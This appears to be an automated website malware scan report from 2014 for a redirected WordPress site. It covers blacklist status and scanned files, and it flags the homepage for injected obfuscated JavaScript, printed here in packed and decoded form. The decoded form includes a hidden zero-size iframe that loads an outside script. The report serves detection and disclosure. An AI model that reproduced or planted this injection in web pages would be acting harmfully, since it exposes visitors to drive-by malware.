Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=babiandsanfield.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://babiandsanfield.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.babiandsanfield.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Tue, 16 Sep 2014 01:31:36 GMT Age: 1 Location: http://www.babisanfield.com Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.babisanfield.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 16 Sep 2014 01:31:38 GMT Location: http://babisanfield.com/ Server: nginx/1.6.1 Vary: Cookie Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://babisanfield.com/xmlrpc.php | clean |
http://babisanfield.com/ | 200 OK Content-Length: 29576 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
Decoded script:
var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>
Antivirus reports:
http://babisanfield.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/custom.js?ver=3.7.1 | 200 OK Content-Length: 16536 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/jquery.prettyPhoto.js?ver=3.7.1 | 200 OK Content-Length: 21861 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-includes/js/comment-reply.min.js?ver=3.7.1 | 200 OK Content-Length: 753 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/themes/Classy/js/jquery.easing.1.3.js?ver=3.7.1 | 200 OK Content-Length: 5368 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.45.0-2013.10.17 | 200 OK Content-Length: 14723 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.4 | 200 OK Content-Length: 8326 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/show-excerpt.js?ver=3.7.1 | 200 OK Content-Length: 473 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/jquery.colorbox-min.js?ver=3.7.1 | 200 OK Content-Length: 10996 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/detect-mobile.js?ver=3.7.1 | 200 OK Content-Length: 2546 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery-ui-1.8.23.custom.js?ver=3.7.1 | 200 OK Content-Length: 20343 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery.mousewheel.min.js?ver=3.7.1 | 200 OK Content-Length: 1392 Content-Type: application/javascript | clean |
http://babisanfield.com/wp-content/plugins/wp-rss-multi-importer/scripts/scroll/jquery.kinetic.js?ver=3.7.1 | 200 OK Content-Length: 11176 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: babiandsanfield.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: babiandsanfield.com
Referer: http://www.google.com/search?q=babiandsanfield.com
Result:
The result is similar to the first query. There are no suspicious redirects found.